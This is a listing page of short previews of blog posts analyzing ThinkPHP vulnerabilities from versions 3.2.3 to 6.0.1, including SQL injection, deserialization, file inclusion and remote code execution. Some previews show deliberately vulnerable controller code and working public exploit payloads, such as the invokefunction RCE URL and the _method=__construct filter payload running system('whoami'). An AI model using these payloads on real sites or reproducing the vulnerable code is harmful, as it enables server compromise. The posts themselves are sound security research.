ThinkPHP
文章平均质量分 81
0x6b79
!
展开
-
ThinkPHP6.0.1_反序列化漏洞分析
ThinkPHP6.0.1_反序列化漏洞分析ThinkPHP6.0.0-ThinkPHP6.0.1漏洞代码<?phpnamespace app\controller;use app\BaseController;class Index extends BaseController{ public function index(){ $data = $_POST['data']; unserialize(base64_decode($data));原创 2021-11-29 00:14:38 · 551 阅读 · 0 评论 -
ThinkPHP6.0.1_任意文件写入漏洞分析
ThinkPHP6.0.1_任意文件写入漏洞分析ThinkPHP6.0.0-ThinkPHP6.0.1漏洞代码<?phpnamespace app\controller;use app\BaseController;class Index extends BaseController{ public function index(){ $a = $_GET['a']; $b = $_GET['b']; session($a,$b);原创 2021-11-29 00:13:54 · 808 阅读 · 0 评论 -
ThinkPHP5.0.9_SQL注入漏洞分析
ThinkPHP5.0.9_SQL注入漏洞分析ThinkPHP5.0.9漏洞代码<?phpnamespace app\index\controller;class Index{ public function index(){ $id = input('id/a'); $data = db('users')->where('id','in',$id)->select(); dump($data); }}PO原创 2021-11-28 23:41:06 · 992 阅读 · 0 评论 -
ThinkPHP5.0.10_parseWhereItem导致的SQL注入漏洞分析
ThinkPHP5.0.10_parseWhereItem导致的SQL注入漏洞分析ThinkPHP5.0.10漏洞代码<?phpnamespace app\index\controller;class Index{ public function test01(){ $username = request()->get('username/a'); $result = db('users')->where(['username' =>原创 2021-11-28 23:33:35 · 578 阅读 · 1 评论 -
ThinkPHP5.1.17_parseArrayDate函数导致的SQL注入漏洞分析
ThinkPHP5.1.17_parseArrayDate函数导致的SQL注入漏洞分析ThinkPHP5.1.16-ThinkPHP5.1.17(非最新版的5.1.18版本也可利用漏洞代码<?phpnamespace app\index\controller;class Index{ public function index(){ $username = request()->get('username/a'); db('users')-&g原创 2021-11-28 23:19:00 · 140 阅读 · 0 评论 -
ThinkPHP5.0.15_parseData造成SQL注入漏洞分析
ThinkPHP5.0.15_parseData造成SQL注入漏洞分析ThinkPHP5.0.13-ThinkPHP5.0.15/ThinkPHP5.1.0-ThinkPHP5.1.5漏洞代码<?phpnamespace app\index\controller;class Index{ public function index(){ $username = request()->get('username\a'); db('users')-原创 2021-11-28 22:41:13 · 1144 阅读 · 0 评论 -
ThinkPHP5.1.22_order by注入
ThinkPHP5.1.22_order by注入ThinkPHP5.1.16-ThinkPHP5.1.22漏洞代码<?phpnamespace app\index\controller;class Index{ public function index(){ $orderby = request()->get('orderby'); $result = db('users')->where(['username' => 'adm原创 2021-11-28 22:36:04 · 888 阅读 · 0 评论 -
ThinkPHP5.1.25_聚合函数的SQL注入分析
ThinkPHP5.1.25_聚合函数的SQL注入分析ThinkPHP5.0.0-ThinkPHP5.0.21/ThinkPHP5.1.3-ThinkPHP5.1.25漏洞代码<?phpnamespace app\index\controller;class Index{ public function index(){ $options = request()->get('options'); $result = db('users')-&g原创 2021-11-28 22:30:41 · 694 阅读 · 0 评论 -
ThinkPHP5.0.18_文件包含漏洞分析
ThinkPHP5.0.18_文件包含漏洞分析ThinkPHP5.0.0-ThinkPHP5.0.18/ThinkPHP5.1.0-ThinkPHP5.1.10漏洞代码<?phpnamespace app\index\controller;use think\Controller;class Index extends Controller{ public function index(){ $this->assign(request()->get()原创 2021-11-28 22:22:12 · 457 阅读 · 0 评论 -
ThinkPHP_cache缓存函数代码执行漏洞
ThinkPHP_cache缓存函数代码执行漏洞ThinkPHP3.2.3-ThinkPHP5.0.10漏洞代码<?phpnamespace app\index\controller;use think\Cache;class Index{ public function test01(){ Cache::set("name",input("get.username")); return "Cache success"; }}p原创 2021-11-21 12:15:14 · 783 阅读 · 0 评论 -
ThinkPHP5.0.24_反序列化漏洞在Linux下的写马分析
ThinkPHP5.0.24_反序列化漏洞在Linux下的写马分析ThinkPHP5.0.24漏洞代码<?phpnamespace app\index\controller;class Index{ public function test01(){ $code = $_POST['code']; unserialize(base64_decode($code)); }}payload/index.php/index/index/t原创 2021-11-21 12:00:39 · 4528 阅读 · 1 评论 -
ThinkPHP5.1.37_从反序列化到RCE
ThinkPHP5.1.37_从反序列化到RCEThinkPHP5.1.37漏洞代码<?phpnamespace app\index\controller;class Index{ public function test01(){ $b = $_POST['code']; unserialize(base64_decode($b)); }}POC/index.php/index/index/test01?ky=whoamiPOS原创 2021-11-21 11:53:17 · 1009 阅读 · 0 评论 -
ThinkPHP未开启强制路由导致RCE
未开启强制路由导致RCE对TP5.0.5的RCE分析ThinkPHP5.0.5payload/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami未开启强制路由,并开启兼容模式漏洞分析先进入App::run方法,然后前面那些获取默认语言啥的代码不用管,再获取$dispatch变量,此变量为空进而调用rout原创 2021-11-21 11:49:23 · 515 阅读 · 0 评论 -
ThinkPHP5.0.5_变量覆盖导致的RCE漏洞分析
TP5.0.5_变量覆盖导致的RCE漏洞分析TP的RCE漏洞有两个大版本的区别TP 5.0-5.0.24 这个RCE在5.0.13之后的版本需要开启debug模式TP 5.1.0-5.1.30POChttp://localhost:8009/public/index.phpPOST:_method=__construct&method=GET&filter[]=system&s=whoami漏洞分析在经过App::routeCheck()->Ro原创 2021-11-21 11:40:12 · 1428 阅读 · 0 评论 -
ThinkPHP3.2.3_bind注入
漏洞环境ThinkPHP3.2.3漏洞代码<?phpnamespace Home\Controller;use Think\Controller;class IndexController extends Controller { public function index(){ $User = M('users'); $user['id'] = I('id'); $data['password'] = I('password');原创 2021-11-21 11:35:36 · 1156 阅读 · 0 评论 -
ThinkPHP3.2.3_where注入
漏洞环境ThinkPHP3.2.3漏洞代码<?phpnamespace Home\Controller;use Think\Controller;class IndexController extends Controller { public function index(){ $data = M('users')->find(I('GET.id')); var_dump($data); }}POC/?id[where]=1原创 2021-11-21 11:30:58 · 523 阅读 · 0 评论 -
TP3.2.3_parseWhereItem设计缺陷导致的SQL注入漏洞
漏洞环境ThinkPHP3.2.3版本漏洞代码<?phpnamespace Home\Controller;use Think\Controller;class IndexController extends Controller { public function index(){ $id = $_GET['id']; $data = M('users')->where(array('id'=>$id))->find();原创 2021-11-21 11:26:31 · 948 阅读 · 0 评论